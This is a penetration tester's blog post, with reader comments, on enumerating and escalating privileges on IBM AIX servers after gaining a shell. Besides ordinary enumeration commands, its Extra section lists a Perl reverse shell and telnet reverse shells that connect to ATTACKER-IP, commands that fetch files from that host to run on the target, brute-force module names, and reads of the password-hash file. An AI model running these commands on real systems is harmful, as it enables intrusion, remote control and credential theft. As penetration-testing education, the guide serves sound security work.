AIX for Penetration Testers

Background:

On a recent internal pentesting engagement I managed to get an unprivileged shell on one of my client’s servers. It was a business critical server so enumerating it and rooting it was the next logical move to make.

I always begin my enumeration by running the “uname -a” command to get some basic system information; funny thing though, this time around I had no idea what some of the output meant.

This was my first encounter with privilege escalation on AIX and I was pretty surprised by how little information I found online on enumerating AIX systems. Most of the post-exploitation guides/posts I read only mentioned where the user password hash file is stored (/etc/security/passwd) since it’s different from the regular location (/etc/shadow). But after I spent a little time aimlessly running commands that kept failing, I quickly realised that this wasn’t the only difference between AIX and other Unix systems.

It took me a little time going through various AIX system administration guides and command cheatsheets (links at the bottom of the post) and putting together a list of various post-exploitation techniques to use on the box. I decided to put this blog-post up with the hope that it will one day help another clueless pentester/red teamer.

AIX:

AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. AIX is an enterprise-class OS so it tends to be preferred by large organisations like banks, governments, insurance companies, power stations and universities.

AIX’s default shell was the Bourne shell (/bin/sh) up to AIX version 3, but it has since been changed to the Korn shell (/bin/ksh). The most recent version of AIX at the time of writing is AIX 7.2.

I should make it clear that the majority of basic Unix commands will work on AIX systems: navigation, directory listing, process listing, file manipulation, searching and grepping etc. You’re not going to have to relearn Unix administration from scratch, but there are some tricks you may want to add to your arsenal if you want to adequately enumerate an AIX server.

AIX Enumeration:

There are already plenty of great Linux post-exploitation guides on the web (links at the bottom of the post), and a lot of the enumeration techniques in them will work on AIX. So I’m going to try as much as possible not to reinvent the wheel; there will be a little repetition of basic/familiar commands, but I’ll do my best to keep it to a minimum.

I like to split my system enumeration into 7 general sections, so this is what I’ll use to structure this post:

  1. System Info
  2. Users & Groups
  3. Drives & Shares
  4. Network Info
  5. Process Info
  6. Software/Packages
  7. Config & Miscellaneous

 

UPDATE: I’ve created a GitHub repo with all the enumeration tips below. You can find the repo here:
https://github.com/V1V1/AIX-for-Penetration-Testers

 

1. System Info:

prtconf
  Purpose: Prints system configuration.
  Comments: This will give you a significant amount of information about the system: architecture, processor and memory information, network information, storage information etc. This is probably the first command you should run on AIX systems since it will give you a lot of useful information about the server.

uname -a
  Purpose: Prints the OS name, hostname, release number of the operating system, operating system version and machine ID.

uname -x
  Purpose: Prints the information specified with the '-a' flag as well as the LAN network number, as specified by the '-l' flag.

uname -M
  Purpose: Prints the system model.

uname -u
  Purpose: Displays the system ID/serial number.

oslevel -s
  Purpose: Prints AIX version information.
  Comments: Sample output: 6100-07-05-1228
    The first four digits are the major release, e.g. AIX 6.1.
    The next two digits denote the TL (Technology Level), e.g. TL07.
    The third set of digits is the SP (Service Pack), e.g. SP05.
    The final four digits are the (US format) date of this release, e.g. 28th December.

lscfg -p
  Purpose: Prints a list of all installed resources.

lsdev -C | sort -d
  Purpose: Prints a list of all hardware attached to the server.

lssrc -a
  Purpose: Prints a list of all system resources on the server.
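
As an added example (this is not code from the post or from the V1V1/AIX-for-Penetration-Testers repo), here is a small POSIX sh helper for the oslevel -s breakdown above: it splits a level string into its release, TL and SP fields, prints the "AIX 6.1 TL07 SP05" form and checks whether a host is at or above a minimum maintenance level, which is the comparison you need when deciding whether a box is behind on patches. The level strings are constructed sample values; the trailing build field is carried through for display only and is not interpreted.

```shell
#!/bin/sh
# Added example (not from the original post): parse and compare `oslevel -s`
# strings such as 6100-07-05-1228, whose fields are release-TL-SP-build. The
# build field is kept for display only. All level strings below are
# constructed sample values.

# Validate one oslevel string and print its four fields, e.g. "6100 07 05 1228".
oslevel_fields() {
    case $1 in
        [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]) ;;
        *) echo "not an oslevel -s string: $1" >&2; return 1 ;;
    esac
    IFS='-' read -r rel tl sp build <<EOF
$1
EOF
    printf '%s %s %s %s\n' "$rel" "$tl" "$sp" "$build"
}

# Human-readable form: "6100-07-05-1228" -> "AIX 6.1 TL07 SP05 (build 1228)".
oslevel_describe() {
    set -- $(oslevel_fields "$1"); [ $# -eq 4 ] || return 1
    major=${1%???}                   # "6100" -> "6"
    minor=${1#?}; minor=${minor%??}  # "6100" -> "1"
    printf 'AIX %s.%s TL%s SP%s (build %s)\n' "$major" "$minor" "$2" "$3" "$4"
}

# Collapse release/TL/SP into one integer so levels compare with -ge:
# 6100-07-05 -> 6100*10000 + 7*100 + 5 = 61000705. Leading zeros are
# stripped first because the shell would read "07" as an octal literal.
oslevel_key() {
    set -- $(oslevel_fields "$1"); [ $# -eq 4 ] || return 1
    tl=${2#0}; sp=${3#0}
    echo $(( $1 * 10000 + tl * 100 + sp ))
}

# True (exit 0) when the host level $1 is at or above the baseline $2.
oslevel_at_least() {
    [ "$(oslevel_key "$1")" -ge "$(oslevel_key "$2")" ]
}

# Constructed sample: the level a host reports and the baseline it should meet.
HOST_LEVEL="6100-07-05-1228"
BASELINE="6100-07-04-1216"
oslevel_describe "$HOST_LEVEL"
if oslevel_at_least "$HOST_LEVEL" "$BASELINE"; then
    echo "host meets baseline $BASELINE"
else
    echo "host is BELOW baseline $BASELINE: check TL/SP before trusting it"
fi
```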

2. Users & Groups:

id
  Purpose: Prints the current user’s details and group information.

who -a / w / last -a
  Purpose: Prints information about logged-in users.

cat /etc/passwd
  Purpose: Prints a list of all users.

lsuser ALL
  Purpose: Prints a list of all users and their attributes.

cat /etc/group
  Purpose: Prints a list of all groups.

lsgroup ALL
  Purpose: Prints a list of all groups and their attributes (including members).

cat /etc/security/passwd
  Purpose: Prints all users’ password hashes (requires root).
  Comments: AIX password hashes aren’t stored in the same format as on other Unix systems. More on this later.

AIX User Management:

If you manage to get access to an account with user management privileges, this section might come in handy:

Unix command    AIX command           Purpose
useradd         mkuser                Create a user.
usermod         chuser                Modify a user.
userdel         rmuser                Delete a user.
usermod -s      chsh OR passwd -s     Change a user’s shell.
passwd -l       chuser login=false    Lock a user’s account.

3. Drives & Shares:

lspv
  Purpose: Prints a list of disks on the server.
  Comments: Sample output:
    hdisk1 004ce4cf0ff6d5c6 rootvg active
    hdisk2 00c9b8fa3120beb9 datavg active
  In this example the system has 2 physical disks and they are assigned to 2 Volume Groups (rootvg and datavg). Every AIX system has a “rootvg”, as this is where AIX is installed and the system is booted from.

lspv hdisk0
  Purpose: Prints information about a specified hard disk.

lsvg
  Purpose: Prints a list of all volume groups.
  Comments: A VG (Volume Group) is a logical disk that can consist of one or more physical disks or LUNs (logical unit numbers). VGs enable files to be spread across multiple disks (aka Physical Volumes or PVs).

lsvg -l rootvg
  Purpose: Prints information about a specified volume group.

mount
  Purpose: Prints information about all mounted filesystems.

df -k / df -h
  Purpose: Prints mounted filesystem information: disk usage, mount location etc.

lsps -a
  Purpose: Prints paging space information.

lslpp -L | grep nfs
  Purpose: Verifies whether NFS is installed.

lssrc -g nfs | grep active
  Purpose: Checks NFS/NIS status.

cat /etc/xtab
  Purpose: Checks whether the server is an NFS server and which directories are exported.

showmount
  Purpose: Shows hosts that export NFS directories.

showmount -e
  Purpose: Shows which directories are exported.

4. Network Info:

ifconfig -a
  Purpose: Prints information about the server’s network interfaces.

lsdev -Cc if
  Purpose: Prints hardware information about the server’s network interfaces.

netstat -i
  Purpose: Prints a table of all network interfaces.

netstat -nr
  Purpose: Prints the server’s routing table.

arp -a
  Purpose: Prints the server’s ARP table.

namerslv -Is
  Purpose: Prints a list of all the nameservers the server has access to.

hostent -S
  Purpose: Prints a list of all host entries on the server.

grep 80 /etc/services
  Purpose: Prints the /etc/services entry for a specified service/port (80 in this example).

5. Process Info:

ps aux
  Purpose: Prints running process information.

who -p /var/adm/wtmp
  Purpose: Prints the processes from users logged into the server.

6. Software/Packages:

echo $PATH
  Purpose: Prints the current user’s path/environment.

whereis 'program'
  Purpose: Locates a specified program on the server.

which 'program'
  Purpose: Locates a specified program on the server (will only search the current user’s path/environment).

lslpp -L
  Purpose: Prints a list of the server’s software inventory.

lslpp -h
  Purpose: Prints a list of the server’s software history.

lslpp -L | grep 'program'
  Purpose: Searches the server’s software inventory for a specific program.

rpm -qa
  Purpose: Prints a list of all installed rpm packages.

rpm -qa | grep 'package'
  Purpose: Searches for a specific program in all installed rpm packages.

ls -l /usr/bin
  Purpose: /usr/bin directory listing.

7. Config & Miscellaneous:

Before I get into this section, I’ll mention that there is no exhaustive guide to enumerating every server’s configuration, since this is completely dynamic and will vary based on the environment and the respective system’s purpose. The post-exploitation guides at the bottom of this post have a long list of techniques that will help you out in this phase. That said, I’ll summarise some general strategies that may come in handy.

Configuration files
  Strategies: Like most Unix systems, AIX has an ‘/etc’ directory where you’re likely to find lots of configuration files, so take your time going through it. Search individual users’ home directories for configuration directories/files, e.g. the ‘.ssh’ folder. Also search additional/3rd-party software directories and files. AIX is often used for sensitive applications such as core banking systems, and you may be fortunate enough to find gems like hard-coded database passwords in these files.
  Sample commands:
    ls -l /etc
    ls -lR /etc/ | grep "conf"
    ls -lR /path/to/somewhere/ | grep "config"

User activity
  Strategies: Show me your shell history and I’ll show you who you are. A user’s history can often reveal a lot of sensitive information; I’ve often come across admins echoing passwords into commands to avoid typing them at interactive prompts. Search home folders and other directories for scripts written by server admins; these can occasionally be gold mines.
  Sample commands:
    cat /home/USER/.sh_history
    cat /home/USER/.vi_history
    cat /home/USER/.profile
    grep ^sh /home/*/.*hist*
    grep ^ssh /home/*/.*hist*
    grep ^telnet /home/*/.*hist*
    ls -lR /path/to/somewhere/ | grep "\.sh"

Cron jobs
  Strategies: Cron allows admins to schedule tasks to run at any hour of the day or night, making regular upkeep a breeze. Custom scripts specified in cron jobs can often contain sensitive information like passwords.
  Sample commands:
    crontab -l
    cat /var/spool/cron/crontabs/*
    cat /var/adm/cron/log
    cat /var/adm/cron/cron.deny
    cat /var/adm/cron/cron.allow

Logs
  Strategies: Log files can occasionally contain sensitive information. AIX has various directories you should search for potentially sensitive log files. You can also use the ‘alog’ utility to view specific logs. AIX also comes with the ‘errpt’ utility, which you can use to generate error reports from entries in an error log. You can read more about its usage here.
  Sample commands:
    ls /var/log/
    ls /var/adm
    cat /var/log/messages
    cat /var/adm/messages
    cat /var/adm/ras/errlog
    alog -L             # list all available logs
    alog -o -t LOG      # view a specific log, e.g. to view the boot log: alog -o -t boot
    errpt | head        # view the most recent error log entries

Archive files
  Strategies: Archive files are often used to back up data, and you may come across archive files which contain sensitive information (e.g. application passwords, configuration files, ssh keys and databases). Use find to discover archive files (e.g. .tar, .gz, .a). AIX libraries with the “.a” extension are ‘ar’ archive files; ar is the utility for creating and extracting such archives, and it is installed by default on AIX.
  Sample commands:
    ls -lR /path/to/somewhere/ | grep "\.tar"
    ls -lR /path/to/somewhere/ | grep "\.gz"
    ls -lR /path/to/somewhere/ | grep "\.a"

“Interesting” files
  Strategies: Again, this varies significantly depending on the server’s purpose. The ‘find’ command works on AIX, so the options here are limitless. Some general strategies:
    Review all SUID/SGID (setuid/setgid) files.
    Search and grep for files containing interesting strings, e.g. password.
    Search the ‘/tmp’ directory.
  Sample commands:
    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -1000 -print 2>/dev/null
    find / -perm -2000 -print 2>/dev/null
    find / -perm -3000 -print 2>/dev/null
    grep -rnw /path/to/somewhere/ -e "password"
    ls -la /tmp

Extra:

This section was a bit of an afterthought but I decided to throw it in anyway. It’s basically a few techniques involving default AIX packages/services that you may find useful at various stages of your assessment.

1. Exploitation – getting your initial foothold:

The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers.

21 (FTP)
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/ftp/ftp_login

22 (SSH)
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/ssh/ssh_login

23 (Telnet)
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/telnet/telnet_login

512 (rexec)
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/rservices/rexec_login

513 (rlogin)
  Attack vector: Brute force. Metasploit module: auxiliary/scanner/rservices/rlogin_login

80, 443 and countless others (Web)
  Attack vector: Default passwords, brute force, shell uploads (WAR, jsp) etc. The ports will vary depending on what additional software is installed on the server.

2. Reverse shells:

So you have command execution and want to level up and get a reverse shell? Set up a listener and try a few of the commands below.

Perl
  /usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Telnet
  telnet ATTACKER-IP 80 | /bin/sh | telnet LOCAL-IP 44445

Telnet
  telnet ATTACKING-IP 80 | /bin/sh | telnet ATTACKING-IP 443

NOTE: Remember to listen on both port 80 & 443.

3. TTY shells:

As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.

/bin/sh
  /bin/sh -i

Perl
  perl -e 'exec "/bin/sh";'

Perl (from inside an interactive perl session)
  exec "/bin/sh";

4. File downloads:

At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server. Default AIX installations are missing a lot of the basic utilities you’re likely to come across on other Unix systems. The server I was on didn’t have wget, curl or nc installed. Admins may install some of them as additional utilities, but it’s safer to assume you won’t find any of them on the box.

Fortunately, there are some default programs installed on AIX that can aid you with file downloads.

FTP
  ftp ATTACKER-IP
  (input username & password)
  get FILE
  exit

SCP
  scp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE

Telnet
  (echo 'GET /FILE'; echo ""; sleep 1; ) | telnet ATTACKER-IP 80 > FILE

  NOTE: This command will also record some unnecessary telnet output at the top of the downloaded file, which could affect execution if it’s a shell script. You can use tail to strip this unnecessary output:
  tail -n +6 FILE > FILE2

Perl
  echo '#!/usr/bin/perl' > downloader.pl && echo 'use LWP::Simple; getstore("http://ATTACKER-IP:80/FILE", "FILE");' >> downloader.pl && perl downloader.pl

Perl
  lwp-download http://ATTACKER-IP/FILE

  NOTE: lwp-download usually comes packaged with Perl.

5. Privilege Escalation:

IBM is quite proud of AIX’s security reputation, and with good reason too: there aren’t a lot of exploits out there for their product. The good news is that Offensive Security’s Exploit Database does have a number of privilege escalation exploits for various versions of AIX that you may find useful.

[Image: searchsploit output listing AIX privilege escalation exploits]

6. Cracking AIX passwords:

AIX’s user password hashes are stored in the ‘/etc/security/passwd’ file. I mentioned earlier that these hashes aren’t stored in a format similar to other Unix systems. Hashcat does have support for various hashing mechanisms used by AIX systems; you can find some example hashes here (search for AIX).

I also found a Metasploit module that uses John the Ripper to identify weak passwords acquired from AIX systems, but I haven’t tried this out yet. I’ll be sure to update this post when I do.
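
The stanza layout of /etc/security/passwd (mentioned in the Users & Groups section and again here) is worth being able to read: each user has a name: line followed by indented attribute = value lines, and the password value either carries a {scheme} prefix such as {ssha512} or is a bare 13-character legacy crypt hash. The POSIX sh audit below is an added example, not code from the post or its repo; it walks constructed sample stanzas and reports the scheme protecting each account so that legacy-crypt accounts stand out for remediation. It assumes the file is readable (i.e. you are root) and reports any value it does not recognise rather than guessing.

```shell
#!/bin/sh
# Added example (not from the original post): audit /etc/security/passwd for
# weak hashing schemes. AIX keeps one stanza per user: a "name:" line, then
# indented "key = value" lines. Modern hashes carry a {scheme} prefix such as
# {ssha512}; a bare 13-character value is the legacy crypt(3) hash, which only
# keeps 8 characters of the password. The stanzas below are constructed sample
# data (real files indent the attribute lines with a tab).

SAMPLE_PASSWD=$(cat <<'EOF'
root:
        password = {ssha512}06$saltsaltsaltsalt$c0nstructedHashValueNotReal
        lastupdate = 1500000000
        flags =

legacy:
        password = AbCdEfGhIjKlM
        lastupdate = 1400000000
        flags = ADMCHG

svc:
        password = *
        flags =
EOF
)

# Name the scheme protecting one password value.
hash_scheme() {
    case $1 in
        "")      echo "empty (no password set)" ;;
        \*)      echo "disabled (* means no valid password)" ;;
        \{*\}*)  printf '%s\n' "$1" | sed 's/^{\([^}]*\)}.*/\1/' ;;  # {ssha512}06$... -> ssha512
        *)       if [ ${#1} -eq 13 ]; then echo "legacy crypt (DES)"
                 else echo "unrecognised"; fi ;;
    esac
}

# Read stanzas on stdin and print "user<TAB>scheme" for each password attribute.
audit_passwd_stanzas() {
    set -f                       # "password = *" must not glob-expand below
    user=""
    while IFS= read -r line; do
        set -- $line             # whitespace-split: "password = VALUE" -> 3 words
        case ${1:-} in
            *:)        user=${1%:} ;;                                    # "name:" opens a stanza
            password)  printf '%s\t%s\n' "$user" "$(hash_scheme "${3:-}")" ;;
        esac
    done
    set +f
}

# Constructed run over the sample stanzas.
printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd_stanzas
```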

Summary:

Like I said at the beginning, I wrote this post because I was desperately looking for something like it when I was starting my AIX post-exploitation. It’s not a comprehensive guide to AIX/Unix enumeration, but with any luck it may come to the aid of another despairing internet adventurer in the future. If it helps just one person, then it’s served its purpose. Happy hunting.

References:

I went through some incredibly informative material that helped me out both during my engagement (yes, I did root the server 🙂 ) and the writing of this post.

 

1. Linux Post Exploitation:

2. AIX Sysadmin Guides & Cheatsheets:

3. Breaking AIX:

4. Securing AIX – because I love blue teamers 😉

 

7 Comments

  1. smit is the main tool to configure an AIX system, a regular user can access a lot of the available pages on a read only basis.

    lsof is not part of AIX, but is available as part of the AIX Linux Toolbox. fuser, procfile and pstat are usually available though.

    1. Wow. Thanks, man. I can’t believe I missed out on SMIT.
      lsof was running on the AIX server I was playing with, I hadn’t considered that it was an additional utility. I’ll remove it from the list. Thanks!

  2. Cool stuff – thanks for the share.

    You should do an add-on post and walk through how you got access and rooted the box.

  3. I recently had to learn all I could about vulnerability detection on AIX and found some info you might enjoy. Some of this may be wrong, so if anyone wants to correct me I’d appreciate it. While lslpp will show version numbers of installed packages, IBM has a weird method of applying software patches that doesn’t always show in package version numbers. You can use instfix to search for security patches although IBM states, “Ifix IDs can change as interim fixes are removed and added” so it’s not a foolproof method of checking. An ifix ID for a specific security patch will be listed in an APAR. What’s an APAR? Read IBMSpeak on it here http://www-01.ibm.com/support/docview.wss?uid=swg21424131.

    Let’s say you want to check for the bellmail vuln CVE-2016-8972. The APAR can be found on this security advisory http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc. The ifix # is found in the Interim Fix field and you can use it with instfix to see if the patch has been applied… assuming IBM hasn’t decided to change the #. For the above CVE, the ifix # is IV91011s1a. I find it’s better to search for IV91011 as it seems the last 3 may show minor version and patch fixes. On AIX you can run “instfix -ivk IV91011” to see if it’s installed. You can run “instfix -iv > output.txt” to just grab the list of all patches. instfix does not require root/sudo permissions.

    If you do have root access, you can use emgr to install fixes or check to see what’s applied. “emgr -l -v3” will list all applied ifixes with a high level of verbosity, including CVE #s. You may want to redirect that to a file as it can dump a lot of info. Here’s more about emgr http://www-01.ibm.com/support/docview.wss?uid=isg3T1012104.

    Thanks for writing this blog, I wish I had been around a couple of months ago when I had to learn AIX!

    1. Nice! I hadn’t gotten that far with vulnerability detection in AIX, I’m still working on figuring out the basics.
      This is definitely interesting material. Thanks for the share! 🙂
